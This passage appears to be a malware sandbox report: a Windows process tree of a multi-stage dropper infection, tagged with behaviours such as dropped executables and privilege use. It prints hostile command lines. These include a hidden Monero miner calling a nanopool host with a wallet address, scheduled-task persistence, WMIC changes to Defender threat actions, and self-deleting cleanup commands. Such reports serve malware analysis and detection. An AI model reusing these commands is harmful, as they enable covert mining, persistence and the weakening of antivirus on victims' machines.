C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"C:\Users\Admin\Documents\m1dOwok5aPcrur45Ch_l6GVs.exe"6⤵
-
C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"6⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"6⤵
-
C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"6⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"7⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"8⤵
- Checks processor information in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"7⤵
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffeef8e4f50,0x7ffeef8e4f60,0x7ffeef8e4f708⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1624 /prefetch:28⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2152 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2316 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2332 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1672 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3700 /prefetch:18⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4012 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4652 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4624 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3144 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5336 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5480 /prefetch:88⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1612,14060762681060779556,15370133158762266724,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=164 /prefetch:28⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7372 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 73728⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 7372 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 73728⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe6⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe7⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1908b94df837b3158.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1908b94df837b3158.exeSun1908b94df837b3158.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun191101c1aaa.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun191101c1aaa.exeSun191101c1aaa.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'10⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"9⤵
- Executes dropped EXE
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth9⤵
-
C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8088⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8528⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8928⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 8808⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 9968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 10888⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4968 -s 9888⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4916 -s 15648⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\udptest.exe"C:\Users\Admin\AppData\Local\Temp\udptest.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"C:\Users\Admin\AppData\Local\Temp\LivelyScreenRecF18.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"7⤵
-
C:\Users\Admin\AppData\Local\Temp\is-D4JGU.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-D4JGU.tmp\setup_2.tmp" /SL5="$3024E,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-5KGFI.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-5KGFI.tmp\setup_2.tmp" /SL5="$602C0,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global8⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun198361825f4.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun198361825f4.exeSun198361825f4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1905815e51282417.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1905815e51282417.exeSun1905815e51282417.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun195a1614ec24e6a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun195a1614ec24e6a.exeSun195a1614ec24e6a.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun1966fb31dd5a07.exe4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19eb40faaaa9.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19de8ff4b6aefeb8.exe /mixone4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19eb40faaaa9.exeSun19eb40faaaa9.exe1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3788 -s 9442⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun19de8ff4b6aefeb8.exeSun19de8ff4b6aefeb8.exe /mixone1⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 6602⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 6682⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 6442⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 6962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 8402⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 8962⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 10842⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 12322⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 12722⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1564 -s 13642⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1966fb31dd5a07.exeSun1966fb31dd5a07.exe1⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-7565O.tmp\Sun1966fb31dd5a07.tmp"C:\Users\Admin\AppData\Local\Temp\is-7565O.tmp\Sun1966fb31dd5a07.tmp" /SL5="$301D6,247014,163328,C:\Users\Admin\AppData\Local\Temp\7zS471324A2\Sun1966fb31dd5a07.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-6TD5V.tmp\Ze2ro.exe"C:\Users\Admin\AppData\Local\Temp\is-6TD5V.tmp\Ze2ro.exe" /S /UID=burnerch23⤵
-
C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe"C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe" /VERYSILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-BJTQO.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-BJTQO.tmp\ultramediaburner.tmp" /SL5="$B005E,281924,62464,C:\Program Files\Microsoft Office\IIQCOIDHKQ\ultramediaburner.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\89-e4de5-a2f-79880-e6adb1c9a3da0\Kysholowapae.exe"C:\Users\Admin\AppData\Local\Temp\89-e4de5-a2f-79880-e6adb1c9a3da0\Kysholowapae.exe"4⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\0a-d2c83-a80-4f19d-7c01b86ee753a\Maneritaezho.exe"C:\Users\Admin\AppData\Local\Temp\0a-d2c83-a80-4f19d-7c01b86ee753a\Maneritaezho.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exe /eufive & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\g2ujmou4.i2y\GcleanerEU.exe /eufive6⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe /qn CAMPAIGN="654" & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exeC:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe /qn CAMPAIGN="654"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\lzgl45na.ldi\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1632307102 /qn CAMPAIGN=""654"" " CAMPAIGN="654"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exeC:\Users\Admin\AppData\Local\Temp\nb2muvf2.k0k\anyname.exe6⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exe & exit5⤵
-
C:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exeC:\Users\Admin\AppData\Local\Temp\garwqvxo.knk\offer.exe6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Enaxl.exe"C:\Users\Admin\AppData\Local\Temp\Enaxl.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 6840 & erase C:\Users\Admin\AppData\Local\Temp\Enaxl.exe & RD /S /Q C:\\ProgramData\\212894592005830\\* & exit8⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 68409⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Wyexnknyu.exe"C:\Users\Admin\AppData\Local\Temp\Wyexnknyu.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS58A0.tmp\Install.exe.\Install.exe8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7zS5FE4.tmp\Install.exe.\Install.exe /S /site_id "739435"9⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &10⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
